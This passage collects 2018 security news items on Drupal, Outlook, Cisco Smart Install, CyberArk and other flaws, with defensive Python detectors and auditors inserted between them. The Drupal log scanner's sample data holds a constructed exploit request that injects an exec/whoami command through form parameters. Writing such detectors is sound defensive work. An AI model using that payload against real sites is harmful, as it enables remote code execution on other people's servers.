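    for line in text.splitlines():
        m = _LOG_RE.match(line)
        if not m:
            continue
        hit = classify_request(m.group('target'))
        if hit:
            hit.update(ip=m.group('ip'), method=m.group('method'),
                       status=int(m.group('status')))
            findings.append(hit)
    return findings


# Constructed sample lines (not real traffic) shaped like the public PoC's requests.
SAMPLE_LOG = """\
203.0.113.9 - - [13/Apr/2018:10:01:02 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 512 "-" "python-requests/2.18.4"
203.0.113.9 - - [13/Apr/2018:10:01:05 +0000] "GET /user/register?mail%5B%23post_render%5D%5B%5D=exec&mail%5B%23markup%5D=whoami HTTP/1.1" 200 512 "-" "python-requests/2.18.4"
198.51.100.4 - - [13/Apr/2018:10:02:00 +0000] "GET /user/register HTTP/1.1" 200 9300 "-" "Mozilla/5.0"
198.51.100.4 - - [13/Apr/2018:10:02:10 +0000] "POST /node/1?_format=json HTTP/1.1" 403 80 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
```

A `200` on a flagged request is the line worth escalating: on a patched site the sanitizer removes the `#` keys before the Form API sees them, so the probe's command never runs, but the log still records the attempt and the source.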

Web security services, including Cloudflare's Web Application Firewall (WAF), should be able to block attacks exploiting the vulnerability.

“The exploit attempts are currently arriving at a pretty brisk pace,” said ISC handler Kevin Liston. Sucuri founder and CTO Daniel Cid also warned that the number of exploit attempts is expected to grow.

The original Drupalgeddon vulnerability, disclosed in October 2014, was first exploited just 7 hours after a patch was released and it was leveraged by cybercriminals for at least another two years.


'Spectrum' Service Extends Cloudflare Protection Beyond Web Servers
14.4.2018 securityweek
Vulnerebility

Cloudflare on Thursday announced the availability of a new service that extends the company’s protection capabilities to gaming, remote access, email, IoT and other types of systems.

The new product, named Spectrum, allows enterprises to leverage Cloudflare not only to protect their websites, but also any other system that is exposed to the Internet through an open TCP port, including SSH, SFTP, SMTP and custom protocols.

Spectrum includes protection against distributed denial-of-service (DDoS) attacks, which will likely attract the interest of gaming companies. Hypixel, which runs the largest Minecraft server and was one of the first victims of the massive Mirai botnet attacks, has already started using Spectrum.

Banking services provider Montecito Bank & Trust has also started using Spectrum to protect its email and SSH servers.

The new service also integrates with Cloudflare’s IP Firewall, allowing users to choose which connections can pass through to their servers and which should be blocked.


Spectrum also allows organizations to terminate TLS at the edge of the Cloudflare infrastructure, which can speed up performance.

“We think the most interesting outcome is that just by adding support for TLS in the client, Cloudflare can now add encryption to legacy protocols and services that don’t traditionally support encrypted transit,” explained Cloudflare’s Dani Grant.

Spectrum is currently only available to enterprises due to the fact that TCP relies on each service having its own IP address for identification purposes. IPv4 addresses are hard to come by and expensive, but the company says it’s actively thinking about how it can offer Spectrum to everyone, including by offering only IPv6 addresses to non-enterprise customers, or asking users to pay for IPv4 addresses.

The company has released a video showing how easy it is to add TCP applications to Spectrum in the Cloudflare dashboard, and a blog post explaining exactly how Spectrum works and the challenges of implementing such a service.

Cloudflare also announced this year the launch of a remote access service designed to replace corporate VPNs, and a free DNS service.


Illumio, Qualys Partner on Vulnerability-based Micro-Segmentation
14.4.2018 securityweek
Vulnerebility

Vulnerability management has two major components: discovering vulnerabilities, and mitigating those vulnerabilities. The first component is pointless without the second component. So, for example, Equifax, WannaCry, NotPetya, and many other breaches -- if not most breaches -- are down to a failure to patch, which is really a failure in vulnerability management.

In these examples the vulnerabilities were known, but not mitigated. Patches were available, but not implemented. It's a hugely complicated problem, because although there are vulnerability management platforms, immediate patching is not always possible (for fear of breaking essential applications); and the ramifications of not patching are not easily understood.

"Everyone does vulnerability management," says Illumio's VP of product management, Matthew Glenn. "It's like motherhood and apple pie -- it's just something you have to do." So, companies have a vulnerability team that scans for and locates vulnerabilities, and then that team tries to persuade the app team to patch the vulnerable application.

"This creates a really interesting tension," he continued, "because app teams really just want to make sure that their apps are running without interruption, while patching can create an unknown outcome. It takes time to get a patch installed. So, if they can't install a patch, they look for some form of compensating control."

Micro-segmentation firm Illumio is now seeking to provide that compensating control to this problem via a relationship with the Qualys vulnerability platform. Illumio already has a dependency mapping capability, called Illumination, as part of its Adaptive Security Platform. This shows dependencies and connections between different applications, even when spread across multiple data centers or in the cloud. It highlights whether connections are within policy, allowing companies to micro-segment the infrastructure to increase security.


"What we've now added," explains Glenn, "is the ability to import vulnerability scans from Qualys. This creates a new capability we call vulnerability maps." The vulnerability map is color-coded from the Qualys data and overlaid on the app dependency map: green is low and informational; orange is medium risk; and red is critical.

But this doesn't just show the location of the vulnerabilities -- added to the app dependency map it shows the potential ramifications of that vulnerability across the network through open ports and connecting and communicating links, and with the internet. These are the paths that an intruder, having exploited a vulnerability, would seek out for lateral movement through the network.

"What we do," said Glenn, "is combine the Qualys vulnerability data with our application dependency map to let organizations do something they've never been able to do before -- which is just literally see the data paths within and between data centers in the way a bad actor does, and show the exposure of the vulnerabilities on the hosts. We think this is a transformational moment because traditionally the vulnerability management team and the application team are two different groups. This new approach allows them to collaborate together to do something they haven't been able to do before: to see how exposed those vulnerabilities actually are."

Patching individual vulnerabilities may not be immediately possible -- but micro-segmenting the network to isolate the vulnerability as far as possible, is possible. Operators can locate the vulnerability, can see the level of criticality, can see and measure paths open to an attacker (something Illumio calls the 'East-West' exposure score), and can automatically impose mitigating micro-segmentation controls that limit exposure without breaking any apps.

“Digital transformation leads to an explosion of connected environments where perimeter protection is no longer enough. The focus now needs to shift from securing network perimeters to safeguarding data spread across applications, systems, devices, and the cloud,” says Philippe Courtot, CEO and Chairman of Qualys. “The new Illumio integration with Qualys helps enterprises get visibility across hybrid environments and implement appropriate controls to protect assets from cyber threats, whether on premises or in the cloud.”

If a company has a high value application with a vulnerability that cannot be patched, but the vulnerability management team knows there is a 0-day exploit in the wild (all information courtesy of Qualys), the question becomes, what can be done? "You can use micro-segmentation," suggests Glenn, "as a way of creating compensating controls to reduce the exposure of the vulnerability. Arbitrarily blocking vulnerabilities is the pathway to breaking applications. So, we've created a very nuanced approach, where we look at the connectivity paths that allow us to reduce the exposure without breaking the applications.

"We use the connectivity paths to fine-tune a micro-segmentation policy. It can automatically block or constrain applications. Blocking only ever happens automatically if the VEN [Illumio's Virtual Enforcement Node, installed on each host] has never seen traffic on the pathway -- perhaps a developer left a port open months ago. Constraining, however, can use micro-segmentation to reduce the effect of a vulnerability without breaking the application. The visible map allows the operator to see the effect of any new policy rules that, once written, will be pushed out to effect the micro-segmentation."
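The approach Glenn describes, overlaying scan findings on the dependency map, counting who can reach each vulnerable port, blocking only paths the enforcement nodes have never seen traffic on and constraining the rest, can be modelled in a few dozen lines. The following is an added example, not Illumio's or Qualys's code: the policy export, the observed flows, the scan findings and the host names are constructed, and the `east_west` count is a plain stand-in for Illumio's exposure score, not its formula.

```python
from collections import defaultdict

# Added example, not Illumio's or Qualys's code. It models the approach the
# article describes: overlay scan findings on an application dependency map,
# count who can reach each vulnerable port, and split reachable paths into
# ones the enforcement nodes have actually seen traffic on (candidates to
# constrain) and ones they never have (candidates to block). The "east_west"
# count is a simple stand-in for Illumio's exposure score, not its formula.

SEVERITY_RANK = {"critical": 3, "high": 2, "medium": 1, "low": 0, "info": 0}


def exposure_report(allowed, observed, vulns):
    """allowed/observed: iterables of (src, dst, port); vulns: (host, port, severity)."""
    reach = defaultdict(set)
    for src, dst, port in allowed:
        reach[(dst, port)].add(src)
    seen = defaultdict(set)
    for src, dst, port in observed:
        seen[(dst, port)].add(src)
    report = []
    for host, port, severity in vulns:
        sources = reach[(host, port)]
        live = sources & seen[(host, port)]
        report.append({
            "host": host, "port": port, "severity": severity,
            "internet_exposed": "internet" in sources,
            "east_west": len(sources - {"internet"}),   # internal peers that can reach it
            "constrain_to": sorted(live),               # keep only these peers
            "block": sorted(sources - live),            # allowed by policy, never used
        })
    report.sort(key=lambda r: (-SEVERITY_RANK[r["severity"]], -r["east_west"]))
    return report


def proposed_rules(report):
    """Turn the report into explicit segmentation rules: deny the never-used
    paths, and pin the used ones to an allow-list for that port."""
    rules = []
    for r in report:
        for src in r["block"]:
            rules.append(("deny", src, r["host"], r["port"]))
        if r["constrain_to"]:
            rules.append(("allow-only", tuple(r["constrain_to"]), r["host"], r["port"]))
    return rules


# Constructed data standing in for a policy export, VEN-observed flows and a scan.
ALLOWED = {
    ("internet", "web1", 443), ("internet", "web2", 443),
    ("web1", "app1", 8080), ("web2", "app1", 8080), ("dev1", "app1", 8080),
    ("app1", "db1", 3306), ("jump", "db1", 3306),
}
OBSERVED = {
    ("internet", "web1", 443), ("internet", "web2", 443),
    ("web1", "app1", 8080), ("web2", "app1", 8080),
    ("app1", "db1", 3306),
}
VULNS = [("web2", 443, "medium"), ("db1", 3306, "critical"), ("app1", 8080, "high")]

if __name__ == "__main__":
    rep = exposure_report(ALLOWED, OBSERVED, VULNS)
    for r in rep:
        print(r)
    for rule in proposed_rules(rep):
        print(rule)
```

The split between `block` and `constrain_to` is the point: the `jump -> db1:3306` path is allowed by policy but carries no traffic, so closing it cannot break the application, while `app1 -> db1:3306` is live and can only be narrowed to that one peer.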

“Vulnerability management is an invaluable tool in every security team’s arsenal. With our Qualys Cloud Platform integration, organizations can see a map of how active, exposed vulnerabilities can potentially be exploited by a bad actor,” adds Andrew Rubin, CEO and co-founder of Illumio. “By adding vulnerability maps to our Adaptive Security Platform, security teams can see potential attack paths in real time and immediately implement micro-segmentation to prevent the spread of breaches.”

Sunnyvale, California-based Illumio raised $100 million in Series C financing in April 2015, followed by a further $125 million Series D round in June 2017.


LimeSurvey Flaws Expose Web Servers to Attacks
13.4.2018 securityweek
Vulnerebility

A couple of vulnerabilities affecting the popular online survey tool LimeSurvey can be exploited by remote attackers to execute malicious code and take control of web servers with little or no user interaction, researchers warn.

LimeSurvey is a free and open source tool that allows users to create online surveys. The software is downloaded roughly 10,000 times every month and is used by individuals and organizations worldwide.

Researchers at RIPS Technologies discovered two potentially serious flaws in LimeSurvey version 2.72.3.

One of the security holes is a persistent cross-site scripting (XSS) issue that affects the “resume later” feature, which allows users to save partially completed surveys and reload them by providing an email address and password.

The email address field was not properly sanitized, allowing an attacker to inject malicious JavaScript code that would get executed when a user visited a specific web page – the attacker can lure a victim to this web page – or when an administrator viewed the partially saved data in the control panel.

The attacker can exploit the vulnerability to perform various actions on behalf of the authenticated user.

The second vulnerability is an arbitrary file write issue that allows an attacker to upload a malicious file by abusing LimeSurvey’s template editor. Exploiting this flaw requires authentication, but that can be achieved using the XSS bug.

According to RIPS researchers, the vulnerabilities can be chained into a single payload that gives the attacker control over the targeted web server.

“The vulnerability chaining [...] yields a single final exploit which would add malicious JavaScript code to the admin panel through the Continue Later functionality of a public survey,” explained RIPS researcher Robin Peraglie. “As soon as the JavaScript payload is executed in the administrator context it can exploit the arbitrary file write vulnerability to give the adversary persistent shell access to the operating system remotely to maximize impact.”

LimeSurvey developers patched the vulnerabilities in November 2017 with the release of version 2.72.4, just two days after the issues were reported. However, RIPS has advised users to update LimeSurvey to the latest release of version 3.


CVE-2018-0950 flaw in Microsoft Outlook could be exploited to steal Windows Passwords
13.4.2018 securityaffairs
Vulnerebility

An 18-month-old vulnerability in Microsoft Outlook, CVE-2018-0950, could be exploited by hackers to steal Windows passwords.
Almost 18 months ago, security researcher Will Dormann of the CERT Coordination Center (CERT/CC) found a severe vulnerability in Microsoft Outlook (CVE-2018-0950); only now has Microsoft addressed it, and only partially, with the latest Patch Tuesday updates.
The flaw lies in the way Microsoft Outlook renders remotely hosted OLE content when an RTF (Rich Text Format) email is previewed, automatically initiating SMB connections.

The CVE-2018-0950 flaw could be exploited by attackers to steal sensitive data such as Windows login credentials by tricking victims into previewing an email in Microsoft Outlook.
“Outlook blocks remote web content due to the privacy risk of web bugs. But with a rich text email, the OLE object is loaded with no user interaction. Let’s look at the traffic in Wireshark to see what exactly is being leaked as the result of this automatic remote object loading.” wrote Dormann.

The vulnerability, discovered by Will Dormann of the CERT Coordination Center (CERT/CC), resides in the way Microsoft Outlook renders remotely-hosted OLE content when an RTF (Rich Text Format) email message is previewed and automatically initiates SMB connections.

In the attack scenario, a remote attacker exploits the vulnerability by sending an RTF email to the victim; the malicious message contains an image file (OLE object) that is loaded from a remote SMB server under the attacker's control.
“Here we can see that an SMB connection is being automatically negotiated. The only action that triggers this negotiation is Outlook previewing an email that is sent to it.” The following screenshot shows the IP address, domain name, username, hostname and SMB session key being leaked.

“Microsoft Outlook will automatically retrieve remote OLE content when an RTF email is previewed. When remote OLE content is hosted on a SMB/CIFS server, the Windows client system will attempt to authenticate with the server using single sign-on (SSO).” states the CERT. “This may leak the user’s IP address, domain name, user name, host name, and password hash. If the user’s password is not complex enough, then an attacker may be able to crack the password in a short amount of time.”

Because Microsoft Outlook automatically renders OLE content, it initiates an automatic authentication with the attacker-controlled remote server over the SMB protocol using single sign-on (SSO). This leaks the NTLMv2 hash of the user's password, which attackers could crack with commercial tools and services.

Microsoft attempted to address the flaw in the latest security updates, but the update only stops Outlook from automatically initiating SMB connections when RTF emails are previewed; any other SMB attack remains feasible.

“It is important to realize that even with this patch, a user is still a single click away from falling victim to the types of attacks described above,” Dormann added. “For example, if an email message has a UNC-style link that begins with “\\”, clicking the link initiates an SMB connection to the specified server.”

Summarizing, the installation of the Microsoft update for CVE-2018-0950 will not fully protect users from the exploitation of this issue.

Users are advised to apply the following mitigations:

Install the Microsoft update for CVE-2018-0950.
Block ports 445/tcp, 137/tcp, 139/tcp, along with 137/udp and 139/udp used for SMB sessions.
Block NT LAN Manager (NTLM) Single Sign-on (SSO) authentication.
Always use strong passwords.
Never click on suspicious links embedded in emails.
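The port-blocking advice above is only useful if you can also see when a client bypasses it. The following is an added example, not code from the article or from CERT/CC: it parses constructed firewall log lines (the key=value format and every address in them are made up for illustration) and flags SMB/NetBIOS sessions on the ports listed in the mitigations that leave the organisation's internal address ranges, which is exactly the traffic pattern an OLE-triggered authentication to an external server would produce.

```python
"""Flag outbound SMB/NetBIOS sessions to external hosts in firewall logs.

Added example (not from the article or CERT/CC).  The log format, the
internal address ranges and the sample lines are constructed assumptions.
"""
import ipaddress
import re
from collections import Counter

# Ports named in the mitigation list: 445/tcp, 137/tcp, 139/tcp, 137/udp, 139/udp.
SMB_PORTS = {"tcp": {445, 137, 139}, "udp": {137, 139}}

# Assumed internal address space (RFC 1918); anything else is "external".
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed key=value log lines (documentation addresses, not real hosts).
SAMPLE_LOG = """\
ts=2018-04-13T10:01:02Z proto=tcp src=10.0.5.23 dst=10.0.9.4 dport=445 action=allow
ts=2018-04-13T10:01:07Z proto=tcp src=10.0.5.23 dst=203.0.113.77 dport=445 action=allow
ts=2018-04-13T10:01:09Z proto=udp src=10.0.5.23 dst=198.51.100.8 dport=137 action=allow
ts=2018-04-13T10:02:11Z proto=tcp src=10.0.5.23 dst=198.51.100.8 dport=443 action=allow
ts=2018-04-13T10:02:30Z proto=tcp src=10.0.7.9 dst=192.168.20.5 dport=139 action=allow
"""

LINE_RE = re.compile(r"(\w+)=(\S+)")


def parse_line(line):
    """Turn one key=value log line into a dict; None for blank lines."""
    fields = dict(LINE_RE.findall(line))
    return fields or None


def is_external(addr):
    """True when the address is outside every internal range."""
    ip = ipaddress.ip_address(addr)
    return not any(ip in net for net in INTERNAL_NETS)


def find_smb_egress(log_text):
    """Return (src, dst, proto, dport) for SMB sessions leaving the network."""
    hits = []
    for line in log_text.splitlines():
        fields = parse_line(line)
        if not fields:
            continue
        proto, dport = fields["proto"], int(fields["dport"])
        if dport in SMB_PORTS.get(proto, set()) and is_external(fields["dst"]):
            hits.append((fields["src"], fields["dst"], proto, dport))
    return hits


def leaking_hosts(log_text):
    """Count external SMB attempts per internal source host."""
    return Counter(src for src, _, _, _ in find_smb_egress(log_text))


if __name__ == "__main__":
    for src, dst, proto, dport in find_smb_egress(SAMPLE_LOG):
        print(f"ALERT outbound SMB: {src} -> {dst} {proto}/{dport}")
    print(dict(leaking_hosts(SAMPLE_LOG)))
```

A client that shows up in `leaking_hosts` after the Outlook update is either previewing content the patch does not cover (such as the UNC links Dormann describes) or is not yet patched; either way the host, not just the firewall rule, needs attention.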


Here's how hackers are targeting Cisco Network Switches in Russia and Iran
12.4.2018 thehackernews
Vulnerebility 

Since last week, a new hacking group, calling itself 'JHT,' hijacked a significant number of Cisco devices belonging to organizations in Russia and Iran, and left a message that reads—"Do not mess with our elections" with an American flag (in ASCII art).
MJ Azari Jahromi, Iranian Communication and Information Technology Minister, said the campaign impacted approximately 3,500 network switches in Iran, though a majority of them were already restored.
The hacking group is reportedly targeting vulnerable installations of Cisco Smart Install Client, a legacy plug-and-play utility designed to help administrators configure and deploy Cisco equipment remotely. It is enabled by default on Cisco IOS and IOS XE switches and runs over TCP port 4786.
Some researchers believe the attack involves a recently disclosed remote code execution vulnerability (CVE-2018-0171) in Cisco Smart Install Client that could allow attackers to take full control of the network equipment.
However, since the hack apparently resets the targeted devices, making them unavailable, Cisco believes hackers have been merely misusing the Smart Install protocol itself to overwrite the device configuration, instead of exploiting a vulnerability.
"The Cisco Smart Install protocol can be abused to modify the TFTP server setting, exfiltrate configuration files via TFTP, modify the configuration file, replace the IOS image, and set up accounts, allowing for the execution of IOS commands," the company explains.
Chinese security firm Qihoo 360's Netlab also confirms that the hacking campaign launched by the JHT group doesn't involve the recently disclosed code execution vulnerability; instead, the attack relies on the lack of any authentication in the Cisco Smart Install protocol, an issue reported in March last year.

According to Internet scanning engine Shodan, more than 165,000 systems are still exposed on the Internet running Cisco Smart Install Client over TCP port 4786.
Since Smart Install Client is designed to allow remote management of Cisco switches, administrators who need it should keep it enabled but limit access to it using interface access control lists (ACLs).
Administrators who do not use the Cisco Smart Install feature at all should disable it entirely with the configuration command—"no vstack."
Although the recent attacks have nothing to do with CVE-2018-0171, administrators are still strongly advised to install the patches for that vulnerability: with technical details and proof-of-concept (PoC) code already available on the Internet, hackers could easily leverage the flaw in their next attack.
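The two mitigations above, "no vstack" where Smart Install is unused and an interface ACL on TCP 4786 where it is needed, can be checked across an archive of saved running-configs. The following is an added example, not Cisco's or the article's own tooling: it audits constructed IOS config excerpts (hostnames, addresses and the ACL name are made up) and reports switches that have neither protection. It recognises only those two patterns, so a config protected some other way would still be reported as exposed.

```python
"""Audit saved Cisco IOS running-configs for Smart Install exposure.

Added example, not Cisco's tooling.  A switch counts as protected when the
config contains the global "no vstack" command, or when every interface
carries an inbound extended ACL that denies TCP 4786.  Sample configs are
constructed.
"""
import re

SMI_PORT = 4786  # TCP port the Smart Install Client listens on

# Constructed running-config excerpts (hostnames and addresses are made up).
CONFIGS = {
    "sw-core-1": """\
hostname sw-core-1
!
no vstack
!
interface GigabitEthernet1/0/1
 ip address 10.1.1.1 255.255.255.0
""",
    "sw-access-7": """\
hostname sw-access-7
!
ip access-list extended BLOCK-SMI
 permit tcp 10.1.1.0 0.0.0.255 any eq 4786
 deny tcp any any eq 4786
 permit ip any any
!
interface GigabitEthernet1/0/1
 ip address 10.1.7.1 255.255.255.0
 ip access-group BLOCK-SMI in
""",
    "sw-access-9": """\
hostname sw-access-9
!
interface GigabitEthernet1/0/1
 ip address 10.1.9.1 255.255.255.0
""",
}


def smart_install_disabled(cfg):
    """True when the config carries the global 'no vstack' command."""
    return re.search(r"^no vstack\s*$", cfg, re.M) is not None


def acls_blocking_smi(cfg):
    """Names of extended ACLs that contain a deny entry for TCP 4786."""
    names, current = set(), None
    for line in cfg.splitlines():
        m = re.match(r"ip access-list extended (\S+)", line)
        if m:
            current = m.group(1)
            continue
        if line.startswith("!"):      # '!' ends the ACL section
            current = None
            continue
        if current and re.match(r"\s+deny\s+tcp\s.*\beq\s+%d\b" % SMI_PORT, line):
            names.add(current)
    return names


def unprotected_interfaces(cfg):
    """Interfaces whose inbound ACL (if any) does not deny TCP 4786."""
    blocking = acls_blocking_smi(cfg)
    exposed = []
    for block in re.split(r"^interface ", cfg, flags=re.M)[1:]:
        name = block.split("\n", 1)[0].strip()
        m = re.search(r"^\s+ip access-group (\S+) in\s*$", block, re.M)
        if not (m and m.group(1) in blocking):
            exposed.append(name)
    return exposed


def audit(cfg):
    """One-line verdict for a single running-config."""
    if smart_install_disabled(cfg):
        return "ok: smart install disabled"
    exposed = unprotected_interfaces(cfg)
    if exposed:
        return "exposed: " + ", ".join(exposed)
    return "ok: tcp/4786 filtered on all interfaces"


if __name__ == "__main__":
    for host, cfg in CONFIGS.items():
        print(f"{host}: {audit(cfg)}")
```

The "sw-access-7" sample shows the shape of the ACL the article recommends: the management subnet is permitted to 4786 first, everything else to that port is denied, and the list is applied inbound on the interface.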


Critical Code Execution Flaw Found in CyberArk Enterprise Password Vault
12.4.2018 thehackernews
Vulnerebility

A critical remote code execution vulnerability has been discovered in CyberArk Enterprise Password Vault application that could allow an attacker to gain unauthorized access to the system with the privileges of the web application.
Enterprise password vault (EPV) solutions help organizations securely manage their sensitive passwords, controlling privileged account passwords across a wide range of client/server and mainframe operating systems, switches and databases, and keeping them safe from external attackers as well as malicious insiders.
Discovered by German cybersecurity firm RedTeam Pentesting GmbH, the vulnerability affects the Enterprise Password Vault app developed by CyberArk, a password management and security tool that manages sensitive passwords and controls privileged accounts.
The vulnerability (CVE-2018-9843) resides in CyberArk Password Vault Web Access, a .NET web application created by the company to help its customers access their accounts remotely.
The flaw is due to the way the web server unsafely handles deserialization operations, which could allow attackers to execute code on the server processing the deserialized data.
According to the researchers, when a user logs in to their account, the application uses a REST API to send an authentication request to the server, which includes an authorization header containing a serialized .NET object encoded in base64.
This serialized .NET object holds the information about a user's session, but researchers found that the "integrity of the serialized data is not protected."
Since the server does not verify the integrity of the serialized data and unsafely handles the deserialization operations, attackers can merely manipulate authentication tokens to inject their malicious code into the authorization header, gaining "unauthenticated, remote code execution on the web server."
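The root cause described above is that the server deserialized a client-supplied object without first checking that the client had not altered it. The following is an added example, not CyberArk's or RedTeam Pentesting's code, that shows the defensive pattern: the session data is serialized (canonical JSON stands in for .NET serialization here), a HMAC-SHA256 tag under a server-only key is appended, and the server refuses to parse any token whose tag does not verify. The token layout, the key and the session fields are assumptions for illustration. `unprotected_parse` shows the flawed behaviour beside it, and `modified_token` edits a token the way an integrity check must catch.

```python
"""Integrity-protect a serialized session token before deserializing it.

Added example, not CyberArk's or RedTeam Pentesting's code.  Canonical JSON
stands in for .NET object serialization; the token layout (base64 payload,
a dot, base64 HMAC-SHA256 tag) and the key are assumptions.
"""
import base64
import binascii
import hashlib
import hmac
import json
import secrets

# Per-deployment secret held only by the server (generated fresh here).
SERVER_KEY = secrets.token_bytes(32)


def _b64(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _unb64(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _serialize(session):
    # Canonical encoding so the same session always yields the same bytes.
    return json.dumps(session, sort_keys=True, separators=(",", ":")).encode()


def issue_token(session, key=SERVER_KEY):
    """Server side: serialize the session and bind it to a MAC tag."""
    payload = _serialize(session)
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    return f"{_b64(payload)}.{_b64(tag)}"


def verify_token(token, key=SERVER_KEY):
    """Server side: return the session dict, or None if the tag is missing
    or wrong.  The payload is parsed only AFTER the MAC check succeeds."""
    try:
        payload_b64, tag_b64 = token.split(".")
        payload, tag = _unb64(payload_b64), _unb64(tag_b64)
    except (ValueError, binascii.Error):
        return None
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):   # constant-time comparison
        return None
    return json.loads(payload)


def unprotected_parse(token):
    """The vulnerable pattern: parse whatever the client sent, tag ignored."""
    return json.loads(_unb64(token.split(".")[0]))


def modified_token(token, **changes):
    """Constructed client-side edit of the payload that keeps the old tag,
    used here only to show that verify_token rejects it."""
    payload_b64, tag_b64 = token.split(".")
    session = json.loads(_unb64(payload_b64))
    session.update(changes)
    return f"{_b64(_serialize(session))}.{tag_b64}"


if __name__ == "__main__":
    tok = issue_token({"user": "alice", "role": "user"})
    bad = modified_token(tok, role="admin")
    print("genuine  :", verify_token(tok))
    print("modified :", verify_token(bad))            # None
    print("unchecked:", unprotected_parse(bad))       # accepts the edit
```

The MAC alone does not make the deserializer safe; it makes sure only server-produced bytes ever reach it, which is what removes the attack surface the researchers used. Keeping the serialized data in a plain data format such as JSON rather than a full object graph is the second half of the fix.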
Researchers have also released a full proof-of-concept code to demonstrate the vulnerability using ysoserial.net, an open source tool for generating payloads for .NET applications performing unsafe deserialization of objects.
The technical details of the vulnerability and exploit code came only after RedTeam responsibly reported the vulnerability to CyberArk and the company rolled out patched versions of the CyberArk Password Vault Web Access.
Enterprises using CyberArk Password Vault Web Access are highly recommended to upgrade their software to version 9.9.5, 9.10 or 10.2.
If you cannot immediately upgrade, a possible workaround to mitigate this vulnerability is to disable all access to the API at the route /PasswordVault/WebServices.


SAP Patches Critical Flaws in Business Client
12.4.2018 securityweek 
Vulnerebility

SAP this week released its April 2018 set of security patches, which include fixes for critical vulnerabilities in web browser controls delivered with SAP Business Client.

A total of 10 Security Notes were included in this month’s Security Patch Day, along with 2 updates to previously released security notes. One of the Notes was rated Hot News, 4 were High Priority, and 7 had a Medium Priority rating, SAP’s advisory reads.

The most important of the Security Notes addresses multiple vulnerabilities in the web browser controls used to display pages in SAP Business Client 6.5 PL5. The vulnerabilities impact browser controls for Microsoft's Internet Explorer (IE) and the open source Chromium.

“The latter has been determined to show multiple weaknesses like memory corruption, information disclosure and more. Although the SAP note does not explicitly mention it, similar security flaws can be expected for IE,” Onapsis, a firm that specializes in securing Oracle and SAP products, reveals.

Users who follow the Windows update process should be safe from the vulnerabilities in the IE browser control, given that the control “hooks into libraries that are patched alongside other Windows updates,” Onapsis explains.

Delivered with the SAP Business Client, the Chromium browser control requires the newly released security note to patch.

One of the High Priority Security Notes in SAP’s April 2018 patches addresses a denial of service (DoS) in SAP Business One (CVSS score of 7.5), but the bug actually exists in Apache (used as an HTTP server in the Business One service layer). By exploiting the bug, an attacker could terminate the vulnerable application’s process.

SAP also addressed an improper session management issue in SAP Business Objects (CVSS score of 7.3). Tracked as CVE-2018-2408, the vulnerability results in existing user sessions remaining active even after a password change.

This month, SAP also released an update to a Note addressing a code injection vulnerability in SAP Visual Composer (CVSS score of 7.4). The flaw allowed an attacker to inject code into the back-end application by sending a specially crafted HTTP GET request to the Visual Composer. SAP fixed that, but researchers discovered that the bug could be triggered using POST requests as well.

Additionally, SAP released Update 1 to Security Note 2376081. Also featuring a CVSS score of 7.4, the Note patches bugs in VCFRAMEWORK and VC70RUNTIME.

One other update included in this month’s Patch Day is Security Note 2201710. Rated Medium Priority and featuring a CVSS score of 5.4, it is an update to a note released with the September 2015 Patch Day: Fixing Logjam and Alternative chains certificate forgery vulnerabilities in multiple SAP products. 18 SAP products are impacted.

The remaining Security Notes released this month address bugs in SAP CP Connectivity Service and Cloud Connector, Disclosure Management, Solution Manager Incident Management Workcenter, Business One Browser Access, Crystal Reports Server OEM Edition, and Control Center and Cockpit Framework.

SAP also released 4 Security Notes after the second Tuesday of the previous month and before the second Tuesday of this month, for a total of 16 Security Notes, according to ERPscan, another firm specialized in securing Oracle and SAP products.

The resolved issues include 5 implementation flaws, 2 directory traversal issues, 2 cross-site scripting (XSS) flaws, 2 code injection flaws, a buffer overflow, a missing authorization check, a denial of service, an XML external entity (XXE) issue, and a clickjacking issue.


AMD, Microsoft Release Spectre Patches
11.4.2018 securityweek
Vulnerebility

AMD and Microsoft on Tuesday released microcode and operating system updates that should protect users against Spectre attacks.

When the existence of the Spectre and Meltdown vulnerabilities was brought to light, AMD downplayed their impact on its processors, but the company did promise to release microcode updates and add protections against these types of attacks to its future CPUs.

Meltdown attacks rely on a vulnerability identified as CVE-2017-5754, while Spectre attacks are possible due to CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2). In the case of AMD, the company’s processors are not affected by Meltdown thanks to their design, and Spectre Variant 1 can be addressed with software patches – just like in the case of Intel processors.

Mitigating Spectre Variant 2 attacks requires a combination of microcode and operating system updates, which AMD and Microsoft released on Tuesday.

“While we believe it is difficult to exploit Variant 2 on AMD processors, we actively worked with our customers and partners to deploy the above described combination of operating system patches and microcode updates for AMD processors to further mitigate the risk,” said Mark Papermaster, senior vice president and chief technology officer at AMD.

Microcode updates, which users can obtain from device manufacturers via BIOS updates, have been developed for AMD processors dating back to the first Bulldozer core products launched in 2011. The chip giant has published a document detailing the indirect branch control feature designed to mitigate indirect branch target injection attacks such as Spectre Variant 2.

Windows 10 updates released by Microsoft on Tuesday include Spectre Variant 2 mitigations for AMD devices. The patches are also expected to become available for Windows Server 2016 after they are validated and tested.

Microsoft started releasing Spectre patches for devices with AMD processors shortly after the CPU vulnerabilities were disclosed in early January. However, the company was forced to temporarily suspend the updates due to instability issues.

As for Linux devices, AMD said mitigations for Spectre Variant 2 were made available earlier this year.

While AMD processors appear to be less impacted compared to Intel products, lawsuits have still been filed against the company over the Spectre vulnerabilities.


Adobe Patches Vulnerabilities in Six Products
11.4.2018 securityweek 
Vulnerebility

Adobe has patched a total of 19 vulnerabilities across six of its products, including Flash Player, Experience Manager, InDesign CC, Digital Editions, ColdFusion and the PhoneGap Push plugin.

A total of six flaws rated critical and important have been fixed in Flash Player with the release of version 29.0.0.140, including use-after-free, out-of-bounds read, out-of-bounds write and heap overflow bugs that can lead to remote code execution and information disclosure.

Four of the vulnerabilities have been reported to Adobe by researchers at Google Project Zero. While some of the issues have been rated critical, Adobe says there is no evidence of malicious exploitation and the company does not believe exploits are imminent.

